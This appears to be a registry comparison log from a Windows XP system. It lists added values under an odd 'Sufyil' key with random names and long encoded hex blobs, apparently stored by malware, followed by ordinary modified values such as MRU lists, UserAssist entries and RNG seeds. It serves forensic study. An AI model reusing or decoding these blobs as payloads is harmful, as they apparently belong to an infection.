HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\12jcjhb1: 7C 38 5B 8C F9 07 57 67 98 DF 13 61 02 BC EB 08 51 5E CB CC 76 AA D7 50 FE 83 D2 B6 EA 82 D3 DB 63 B8 8B 43 DC E2 C2 CB CC B6 70 ED 1C 61 08 D8 6A 7E A0 5D 57 FA DE C5 AF D7 91 F1 D2 AD 6B 2F A7 88 0B 28 97 70 54 63 34 38 6B 93 6F 61 8C 84 3F E7 95 23 5A BC 49 F9 A2 C1 C4 61 D9 31 F2 C9 2E E6 EF 1E 65 73 2A C2 5F 1A 9E C4 0D 99 CC AF 6D EE C4 77 65 CC 74 A5 BE 18 C3 1E 66 EA 09 47 A0 C2 80 26 69 BA A4 D3 8F C8 18 DB A9 00 60 95 2D E7 C0 3B 7B 15 EC 06 01 62 0B BA 53 B7 F4 72 5A 61 3B 87 4F B4 84 5F B5 FF EB 7D A3 BF 6C 82 18 17 8A 58 A5 CC F6 0E 1E 8E 6C 10 3C 48 48 C7 DB AB 86 68 7A 58 22 A1 E1 BB 7B B5 10 D5 FB F8 37 90 90 A8 A6 C8 8A B0 90 0C 2C A5 9B BD 0B BE E2 2A 44 E3 10 07 C7 60 4E 16 C8 3A D8 08 C7 B8 C3 5A 5E 26 B3 D9 4B 93 8C 67 2B 32 DF F8 5D 42 BB 56 79 28 74 3D DD 9A 94 A4 D7 94 B0 D9 54 C7 F5 25 4C A7 DD 56 4D 9A 34 54 1E EE 04 A0 5D 6B F0 9A 85 67 C4 14 1B D1 F9 CB 97 B3 7D AD 83 0D 7A 26 3D DE 56 21 73 A3 F1 E3 AA 93 5D B2 3B BF 51 7C 98 EF AD 1B D6 0B 9D 36 22 F9 9E F8 8E 59 2F DD F2 F5 85 20 19 7C A5 40 E0 4B 21 A2 70 B5 6B C8 B0 B9 1C 47 3D DC 21 69 90 07 5B 9F AF 86 CA 75 6C 47 7C A5 D3 AF D5 4C 93 D0 A6 F5 F6 EB 2F D9 99 13 DD 6C 66 66 AE 7C 10 F8 D2 C1 66 E7 D5 75 3D 4D 2E 91 77 B4 20 A0 DA A2 A7 54 6C 22 B2 05 14 65 E2 74 36 1F 0D BA 3E DF 0D B9 71 A3 FE 2C 7D B3 A1 2C 17 4D 95 EC A4 99 DA C8 13 DE EE DA FE 75 E8 84 92 D1 22 4D 0B 88 66 67 C6 E1 1C 39 F1 26 0C 12 07 61 68 A0 87 6B BE 9A 4C 9D BB 82 F6 97 AB 39 AD 37 0D A6 1A 4A B0 9A 05 B1 6C 7A FD D5 1A 75 5A A4 F8 97 D6 82 93 5C 5D F2 D3 AC 84 7F 61 A1 7C 84 C5 67 7E 84 D9 57 02 F2 53 32 DA 75 4C 31 EB 76 A5 D3 27 18 58 60 8E 56 7E 71 C6 58 4E B0 34 AF 15 C6 B2 06 3E D8 63 D8 FB 65 65 47 BC 31 97 EC BC CD 20 BF DB 20 49 7A AD 58 E8 7C 77 C0 56 4C 79 B6 1D F3 13 09 91 B8 D0 30 3F 3B B0 81 D1 5C 1C 96 D4 A4 A9 9F 43 DC 0B C5 1A 08 37 96 66 78 62 33 CA 89 C9 4D 1D 55 50 CD 6E B0 38 51 EE F3 9E A9 7C 7A 22 1E C9 55 AE 5C 77 86 5B 93 F6 57 41 F9 14 5E A4 E4 B5 87 0C FD 52 99 AF 06 3B 35 4F 3F 52 ED B6 5A E3 48 C2 A7 5B 63 A6 21 33 3D 32 D4 8F 2F D2 24 3E 74 79 1E D9 E0 60 40 59 26 99 21 0E FD 55 69 82 D3 0E 93 52 33 0A A5 F0 8E BD 17 29 B9 8D C8 E1 A6 63 CB D3 64 AC 61 42 50 A6 CB CC 88 C7 67 C0 C0 D6 41 98 47 00 BF CD 93 29 ED 67 3F F1 B2 4F 0E EA 8E A6 84 C2 5F B5 2E DC 36 C4 8A FF 81 E3 60 C3 96 A2 7B 6C 98 69 3B DD E2 46 73 2F 3C F5 8A 2F 32 D2 63 24 3E 6F F0 7A D3 2F B3 22 1F 65 88 50 78 A1 C9 B0 46 B6 E2 20 46 87 0F 3B A3 DD 0A AA 6B C9 ED EE 71 B5 E7 F6 21 E8 F2 5C 8F FC C4 9A AB 8D 25 A5 C3 00 75 B5 BC FC 19 0E F0 29 BE A5 D0 DE 87 D1 09 24 A6 04 ED 1E 29 17 00 19 14 3C 2F F6 B3 FF 71 FE 1B 76 90 07 44 C2 8A EA F5 31 60 D4 A8 86 E2 95 C4 C3 EA 06 DA 5C C2 42 50 EA 4A 03 0D E8 D9 42 2A 26 C7 40 D7 F5 A0 CC 24 BE E2 64 16 80 71 D8 27 41 6A 30 6D EE 7E 8C DC A2 7A 05 A0 94 E1 EE 83 BE 0A 23 DB 81 FA 0C E8 F8 0A 30 34 19 15 06 D7 79 77 72 A8 0A CD 24 93 74 94 0F 74 A2 0F 5A C9 C7 00 8C 51 FD ED E8 FC 49 89 BC 6B 0D B8 0F 5D CE 9E BB FA 63 FE 36 29 E5 4F 1D 31 6D 85 67 44 02 06 CB FC 1D A5 AC 15 AB BC 86 6B A3 54 99 A2 27 3D 29 42 99 71 DC 3B 06 5F 64 32 1F 1C 24 BD AD 7A 0C 80 C9 7C AE 19 29 08 45 05 C8 35 6D CA AC B1 BC 02 94 38 D7 FD 95 F3 11 0B 78 63 BA F4 89 39 56 4D 47 23 C4 44 1A 7A C7 54 75 8E 0F 5F 61 4A 86 65 17 8C B4 6D 18 5B D3 19 5F CF E1 2A FE 27 DD 98 13 94 9F CD C4 9B 7B AA FB 43 48 1C F2 BD 05 C2 BB EF F1 40 9F 61 4E D9 E7 D8 AF DF CE F7 03 B7 BC DD 24 CD 30 92 9F EE 3A 36 37 2D F5 54 EC DA CC 2D 21 1E 9C 00 64 A9 A0 F6 6C 10 78 A6 0C 63 E3 48 41 49 82 B8 6B 91 B9 7A 3C 80 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\7ec4g79: 66 44 68 62 6A 49 49 33 4B 54 63 66 74 55 77 41 54 6C 66 46 4F 52 36 52 73 37 6A 58 6C 63 66 5A 45 39 4E 33 56 58 6E 39 6C 7A 77 69 6E 6F 5A 47 79 4D 6A 35 49 62 2B 32 63 4F 30 63 59 51 6A 59 61 6E 36 67 58 56 66 36 33 73 57 76 31 35 48 71 52 34 48 6D 6F 5A 65 75 79 41 2F 53 36 6A 61 4A 4E 63 39 34 44 38 76 53 59 4D 36 73 59 37 52 6C 65 71 74 61 46 54 4B 31 78 6A 71 65 50 55 35 66 54 48 5A 59 70 4F 63 4B 67 79 74 55 6E 43 4E 78 49 76 61 75 4C 51 43 78 6F 37 77 37 69 4F 4D 67 51 2B 55 63 44 41 5A 51 54 73 4D 51 6D 5A 35 6E 64 61 5A 6F 4F 79 7A 7A 77 6A 67 2B 48 71 32 58 58 34 46 42 55 50 63 54 33 62 33 34 68 30 77 39 4C 72 52 32 6D 79 4E 4B 4F 4E 66 36 7A 71 51 69 58 6B 52 73 4F 38 6A 4C 43 4F 43 4D 56 41 48 44 32 49 54 51 36 37 67 6F 4E 62 6B 65 6A 65 67 59 55 57 6B 76 6A 51 41 5A 67 56 6B 7A 32 68 77 67 4D 4F 63 32 6B 55 52 55 77 6F 74 66 57 49 55 7A 37 2B 2B 75 6F 4F 49 69 51 68 62 63 6C 34 42 31 70 44 63 4D 6B 48 34 57 49 7A 56 6F 37 48 71 69 49 74 46 57 45 59 61 31 58 66 39 43 47 33 39 55 31 71 4A 37 2F 64 74 52 6D 41 2B 66 4F 4A 34 4D 6B 54 72 53 45 6E 62 2F 6E 79 38 75 47 71 42 2F 55 61 75 4F 68 51 33 75 79 77 6F 59 76 38 54 51 76 34 34 67 35 64 53 51 59 34 34 53 47 65 44 4C 4F 32 75 78 75 6D 34 43 55 49 48 46 4A 5A 34 45 71 57 4D 4F 6B 31 32 79 4F 37 39 52 66 4A 6A 76 72 52 76 57 43 35 30 32 49 76 6D 65 2B 49 35 5A 4C 39 33 79 39 51 41 51 5A 79 77 68 4C 50 34 50 6F 64 66 59 68 6F 2B 30 57 68 6D 47 30 37 38 65 62 75 72 52 71 78 43 50 46 31 33 6B 48 47 78 48 66 4B 58 54 72 39 56 4D 6B 39 43 6D 39 66 62 72 4C 39 6D 5A 45 39 31 73 5A 6D 61 75 66 42 44 34 56 2F 45 59 74 31 4E 35 4D 50 74 35 50 62 46 44 56 6D 72 55 58 4D 51 33 68 33 56 75 32 43 59 61 67 4E 66 58 57 52 62 33 50 74 38 4E 75 58 47 6A 2F 69 78 39 73 36 45 73 46 30 32 56 37 4B 53 5A 32 73 67 54 33 75 37 61 2F 6E 56 75 74 4F 79 42 6F 46 39 56 45 69 70 76 6E 39 6F 7A 70 54 67 34 48 76 36 58 46 53 69 77 77 44 6E 79 4B 35 73 6B 4C 65 48 32 6C 70 73 34 72 54 63 4E 70 70 70 76 61 6E 67 7A 70 66 31 66 5A 37 4A 33 72 57 62 4B 56 42 69 67 79 6C 50 34 66 31 75 74 33 4C 64 6A 41 58 49 47 61 72 46 46 56 70 2B 31 46 70 5A 51 2B 67 30 62 45 53 7A 48 2B 52 69 63 65 4A 62 46 72 75 52 43 62 4B 46 32 58 41 79 37 77 4F 34 38 53 73 68 69 48 65 50 4F 4F 75 33 59 64 4D 6E 38 58 32 2F 65 75 72 72 48 68 52 61 4B 4F 31 34 72 75 2B 69 2F 6B 59 45 48 62 65 4F 35 30 58 4F 4E 66 77 6E 53 49 4C 31 66 4D 77 2F 65 55 35 47 2B 59 2B 49 5A 55 62 64 33 62 65 55 39 48 53 6D 66 72 4D 6E 38 65 4C 37 38 77 64 43 63 43 66 5A 45 74 67 53 36 59 67 67 65 58 2F 63 74 5A 5A 45 78 33 68 6D 5A 34 34 5A 4B 6C 71 44 7A 4B 4E 37 77 76 31 6C 36 4B 6F 32 74 66 42 42 30 41 42 66 77 2F 57 58 63 78 35 74 72 46 48 47 5A 63 6E 4D 59 6E 42 6C 52 6D 48 43 75 71 6C 57 31 70 6E 67 41 53 6F 4B 59 73 69 6E 69 59 51 31 6B 46 4D 34 7A 43 54 57 62 50 31 30 7A 41 52 5A 51 54 42 38 67 68 79 6A 33 45 38 69 61 4B 71 44 42 55 70 62 43 72 44 58 39 66 46 6A 6B 58 68 38 77 65 6B 4D 47 42 72 37 63 77 66 54 55 50 71 64 67 79 34 34 31 4B 4A 48 4F 73 65 71 61 61 5A 59 4A 6D 50 6D 38 2B 43 71 73 6E 55 66 67 72 6F 78 6A 79 6D 50 4B 67 65 77 64 76 43 6B 34 68 45 42 45 51 4F 4A 69 71 53 69 48 44 4A 57 61 62 75 4B 34 42 52 47 67 39 4C 47 39 5A 51 46 44 4F 45 47 49 50 51 5A 51 79 6D 6A 61 76 30 42 77 7A 79 75 42 39 6C 42 4B 77 44 44 4A 37 65 35 78 74 65 66 32 49 65 6A 79 58 49 2F 38 78 4A 71 72 6A 53 57 6C 77 77 42 31 74 62 7A 38 47 59 54 41 56 2B 34 6B 75 6E 59 70 76 44 65 6B 75 58 2B 2B 57 76 67 42 53 47 4B 43 70 72 6D 76 67 72 48 4E 31 57 78 73 6F 51 64 45 77 6F 72 71 39 54 46 67 31 4B 69 47 34 70 58 45 77 2B 6F 47 32 6C 7A 43 51 6C 44 71 53 67 4D 4E 59 2B 6B 38 65 71 59 49 76 47 44 32 55 51 2F 64 49 4D 45 34 57 75 49 6D 64 44 55 6F 74 6E 66 70 4C 64 66 78 4F 47 77 4F 42 61 43 55 34 65 36 44 76 67 6F 6A 32 34 48 36 44 4F 6A 34 43 6A 41 30 47 52 55 47 31 33 6C 33 63 71 69 42 2F 56 76 7A 38 6B 78 64 4C 6B 51 6B 57 33 69 44 66 72 70 51 46 4B 35 67 56 45 33 31 67 4C 4C 35 56 34 43 4B 62 37 31 57 47 31 77 5A 43 69 6E 6C 54 78 30 78 62 59 56 6E 52 41 49 47 79 2F 77 64 70 61 77 56 71 2F 31 38 66 46 44 49 64 4D 77 6F 56 55 56 6E 56 65 69 4D 70 76 48 4D 59 7A 6C 48 44 55 68 73 4C 78 63 38 55 53 75 55 64 30 2F 52 51 35 43 30 30 48 66 39 39 4D 66 43 4D 4F 50 6B 64 37 4E 37 78 5A 62 6E 41 43 58 70 79 7A 4F 52 41 4D 7A 65 30 76 55 6B 52 56 78 4F 65 31 49 79 6C 79 42 6E 74 6F 4A 5A 34 53 59 32 51 77 36 30 4B 38 30 46 77 37 68 31 30 42 59 65 4E 4A 45 64 7A 2B 4B 30 34 79 59 36 77 6E 36 6B 54 77 77 55 67 5A 45 2F 71 41 51 49 4B 4C 45 4F 31 45 71 74 54 74 64 42 58 58 77 72 4D 79 2F 75 64 75 59 63 30 6E 68 66 62 42 63 64 2B 36 6F 6D 41 30 76 33 79 76 4E 68 54 45 6E 4E 77 32 73 70 77 52 2B 59 4F 34 76 48 48 54 66 5A 54 63 50 33 59 6B 33 42 73 2B 57 76 77 67 37 4F 54 63 4C 62 6C 68 6F 47 38 46 53 75 4E 36 75 77 54 56 41 33 63 35 4C 6E 4E 48 66 55 31 4E 4D 44 39 59 4F 74 76 79 6C 39 59 6F 33 72 4F 69 4B 55 44 49 2B 35 43 2B 61 70 30 69 4D 73 37 56 59 50 76 52 2B 54 50 30 2B 55 5A 77 74 70 33 6E 5A 76 38 6F 50 47 62 42 52 45 45 39 4C 7A 6F 57 56 5A 44 7A 42 71 63 6C 7A 31 37 65 48 66 54 4B 50 46 71 53 57 59 35 54 42 33 32 72 2B 2B 2B 34 65 4B 79 30 6A 66 6D 68 44 6C 64 4F 2F 38 56 48 46 6E 6F 34 77 78 33 2F 4D 2F 4D 79 37 33 64 6F 2B 2F 55 71 79 2F 4C 4A 5A 75 62 75 4A 44 62 36 36 62 72 51 32 53 43 4E 50 52 62 4F 67 39 6B 37 6A 61 67 56 49 78 57 58 31 31 75 53 48 58 6F 51 61 6A 63 75 4B 48 58 33 69 74 2F 77 5A 33 6B 4E 50 36 6C 4A 38 78 67 30 62 76 6F 50 59 32 33 39 41 54 63 57 37 49 53 64 4F 45 4C 2B 4D 49 41 6B 44 63 61 49 76 4E 50 45 4C 45 42 72 77 37 72 4C 79 57 4D 4F 41 73 4F 44 30 2B 72 4F 73 6E 6B 30 54 4A 30 6E 59 50 41 4D 45 69 31 57 47 52 33 4F 4A 35 56 55 51 30 73 51 73 48 62 38 4A 69 31 76 66 6F 34 31 34 44 66 63 4B 65 6E 6D 66 68 76 33 73 79 7A 76 2B 57 59 2B 2F 70 6D 37 52 49 49 71 72 47 65 4A 43 42 67 45 4F 6B 32 31 38 4E 2B 76 37 63 45 4E 71 53 56 2F 4B 4C 52 35 66 33 37 56 51 4E 49 61 34 57 49 6D 35 33 2F 6C 59 42 78 71 6D 70 35 76 31 74 46 32 78 30 78 6D 53 46 47 45 33 52 31 77 4A 47 35 36 7A 64 32 41 4B 35 37 68 39 38 65 4C 39 36 33 72 79 4E 6B 52 4B 68 4E 61 30 6B 55 7A 4E 30 45 75 67 41 2B 56 43 55 52 74 2F 6E 4B 36 45 2F 62 51 70 45 2B 4F 6E 66 4D 37 61 2F 47 66 4F 2F 76 65 51 51 4B 78 61 46 30 62 73 69 77 7A 47 6F 78 4B 38 53 50 2F 43 54 56 2F 55 52 61 37 58 2F 42 49 63 43 43 6B 6D 5A 41 6B 4A 38 65 35 50 62 2B 54 55 72 4B 79 68 42 47 56 33 4B 6A 44 41 62 54 42 42 59 63 68 4C 6B 6F 78 30 48 2F 4C 65 38 58 59 34 77 39 73 63 35 68 47 68 67 78 6D 4A 55 74 69 6C 50 57 6D 45 58 74 59 62 57 44 74 42 2B 4B 36 74 45 45 62 35 58 52 30 33 51 38 4E 46 32 50 39 51 52 4E 75 6A 57 44 6F 77 46 43 38 56 2B 57 50 4A 32 68 64 44 57 63 50 58 48 6B 4E 56 4D 6F 78 2F 6E 54 65 41 64 58 44 34 78 45 53 76 55 57 2B 67 59 51 45 4A 77 38 38 42 56 39 55 33 55 71 6F 58 50 41 46 34 37 4A 6D 6E 63 6B 38 49 65 79 64 6D 65 51 31 48 6C 70 75 45 2F 6C 4D 37 2B 41 44 31 36 78 4D 69 59 46 53 61 48 62 67 4B 5A 48 71 6A 32 67 4A 53 2B 77 67 38 62 4C 56 2B 78 6F 4C 4F 6E 59 38 54 41 41 6C 79 50 6A 4C 7A 77 50 6E 69 67 6B 50 39 75 6B 59 4C 52 43 79 6F 2F 51 45 2F 57 78 31 30 79 47 69 2B 63 52 45 47 49 78 48 73 38 33 57 7A 77 67 76 42 56 68 45 54 43 66 59 61 4A 30 33 45 63 51 73 52 72 67 6F 43 76 47 75 39 51 49 55 57 43 52 59 35 31 6B 6B 6E 65 6F 39 31 5A 45 77 70 4D 36 64 4F 48 50 4C 45 76 54 2F 4A 70 4F 74 68 65 30 62 73 35 47 4D 74 36 49 6D 44 4C 77 31 79 54 75 47 59 53 32 50 64 70 55 4B 61 47 39 55 73 64 68 58 4E 2F 2F 6E 75 49 35 79 6E 73 62 48 4E 4F 50 42 32 7A 41 68 77 6C 36 32 51 51 2F 72 67 49 54 6E 69 74 65 2F 71 63 79 37 6E 34 58 51 46 62 6B 6B 6A 54 7A 66 59 36 52 2B 71 6E 69 49 31 34 66 55 4B 4A 61 77 3D 3D HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1ccc3cfg: 9A A2 3F 43 D5 D4 29 01 0A 77 93 11 1E BD CB F6 47 7D 44 34 F9 57 05 D6 50 A6 04 20 31 A0 C6 83 8F 80 3D 1A 68 60 03 5F 84 3D AC 6C B2 88 18 88 99 2B A0 5D 56 FA DE D5 60 D6 91 F1 63 99 15 7F 5C F2 20 71 D5 02 D6 6E AC 91 73 DC 53 DB 47 F4 B3 CF 90 56 06 13 98 0B 1E BC DF CA 0F B7 06 3A 13 57 8F 81 02 CF D2 65 9B 8D 0E 73 99 06 7A E8 56 FE 55 72 6A F0 3A 4F 71 88 7C AB 6C E6 FF 91 4B 67 52 B1 56 6D AF 13 17 A5 54 4C F6 AB 35 D5 35 F3 91 78 F4 BC 49 8D 2D C0 11 7A 6D D0 DE DF E7 BF 97 6C D7 49 D9 C6 A8 BB BD 34 89 67 09 9E CD 25 1E 58 3F 6B 5B AD 80 F5 01 37 E4 A5 43 59 5A 2A 24 4F 0D BC 9B 5B 82 2F 55 DD AF 89 B1 B4 08 46 53 D3 F7 61 FC 46 9D D0 94 81 C7 EA 48 22 D9 C2 B8 B1 E6 97 E3 89 24 D0 5E CB F6 8F 43 C1 31 24 6D A0 90 59 DF FB 70 F3 A1 5C 78 73 B9 00 93 5B A0 87 1F 34 3F 13 A6 71 8A DF 32 3A D5 D0 28 92 83 34 2D FE B6 FD AD 62 81 C6 E6 DE B8 FE A6 ED BC 9C AB AA 27 57 90 60 14 A9 5E 56 32 82 43 2B 15 7A 80 3F 25 C8 DF 42 83 EF 35 03 7D 93 FA DC CD B7 A7 AF 0E A3 F3 1B 40 DA 3F 3F 73 F3 92 F6 F4 0C 13 94 47 BB 82 08 D7 D2 BD 81 4F 09 AF 1E 67 61 3A 06 1E B8 C0 22 8E 4B 07 08 C3 D0 99 A3 9A A0 15 BE 12 49 BC 8A 2A DB 37 A2 DA BE 17 34 9D 14 70 CD 91 22 3D 72 4B 04 3C B6 FC 5D D3 B0 D0 CD 52 A8 1C F6 EC E0 F3 E5 3C D2 08 06 BA 67 D3 0F 76 6A BB DF 55 77 AC 0C A5 B1 12 7E AC EA C1 4F 91 A4 D8 D8 33 6C EE C6 6D 8B 42 25 F2 8C 81 29 44 B5 8E D8 C5 53 E1 09 74 77 06 E8 91 25 34 B5 43 ED A3 2D 76 1E 02 A8 39 F3 1F 8C AB F2 B3 EA B1 6F 6B 21 83 DC 58 9E F5 75 D2 2B 91 DA 48 5C 36 B6 B0 43 6A 4B A7 5B EA E5 D3 2D 54 AF 2F 45 48 44 C7 34 0D FE FA 51 F3 46 F6 A4 AF 0D 1B 11 2C C7 CD EB 8D EC 27 2F 58 60 8E CA DD 7A 97 DF A3 E0 3A 71 EC DC F1 93 87 CC 2B 42 4B 37 37 D6 9E 08 A1 2B 8B E5 56 67 93 69 2B 20 6C 4A 81 8E 04 04 CC 9B BF C7 ED DF 8B 33 A9 0C 8E 21 75 A1 67 FE D0 5C 1C 96 D5 A4 A9 DF D2 DC 0B C5 AF 08 37 96 6C 89 DF 72 AB 7E EC 51 10 9D 21 4B 0D 4D 16 C5 21 0A B0 00 2F 23 3D 49 76 47 3B 62 22 47 B9 68 46 5C 8F 1E 8F 94 BB D5 73 31 F8 B7 70 94 56 BC 15 38 B0 45 3A BE 48 10 F5 11 DF 4C 9A ED 39 F0 56 31 47 88 91 6C CA 10 D7 6B DF 8D F6 3D 7C 26 B2 27 67 DB 3D 97 4F D1 68 CC EF A0 C7 4D B0 A1 67 3D 22 72 BD 3B 22 FB 13 E2 F5 F9 01 73 23 1E 03 17 1B 42 A5 6F C2 C4 12 14 C6 7C FF C8 76 FC E3 A8 C0 F0 AA AB 69 39 8D 3B 93 6B 1F 03 83 46 68 5B 05 5F C4 8B FF 81 A3 BF C3 96 A2 3E 6D 98 69 B4 04 FC 2D 72 88 F3 49 8D D0 06 71 95 95 46 55 8D 97 FA 80 C3 10 56 2D 54 0F ---------------------------------- Values modified:23 ---------------------------------- HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 90 30 12 62 DD 7F 82 8B 16 05 C8 00 DB B4 6A A5 46 4D 70 E1 BF D3 DF C0 7F 53 19 88 0A 81 8E 16 41 0C 73 6B 8C 8D 74 B2 A2 94 6D 55 8D DC 9D 40 85 6C B0 1F B7 5F A2 35 77 97 7A D6 D7 26 EE 09 C9 06 26 2A 26 AA B5 59 51 09 CF 32 62 5B 0F 61 HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 20 96 FE 0B A2 D7 98 9E C7 C0 44 9D 8F 5B 02 79 62 CE 07 0C 38 C7 E1 A7 C3 61 66 55 B8 D2 89 FB 8C AA 14 30 8F C4 BA 33 00 08 05 78 1F 55 8D 14 8F 02 4F 97 D4 75 FF AA CA 99 B1 97 E8 8C 9B 21 79 3E D3 02 C1 54 C3 8C FE 6C 35 6F C0 C8 03 C6 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000008 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000C HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000 HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000 HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000027 HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000002A HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000027 HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000002A HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000002 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\001.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\002.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "a" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "ab" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "a" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "cba" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "a" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ba" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 00 00 00 00 FF FF FF FF HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 00 00 00 00 FF FF FF FF HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 2F 00 00 00 20 13 9A 5D 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 35 00 00 00 60 65 CB C6 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 06 00 00 00 B0 96 90 4F 1C AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 07 00 00 00 D0 F5 A2 C6 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 02 00 00 00 01 00 00 00 FF FF FF FF HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 02 00 00 00 00 00 00 00 FF FF FF FF 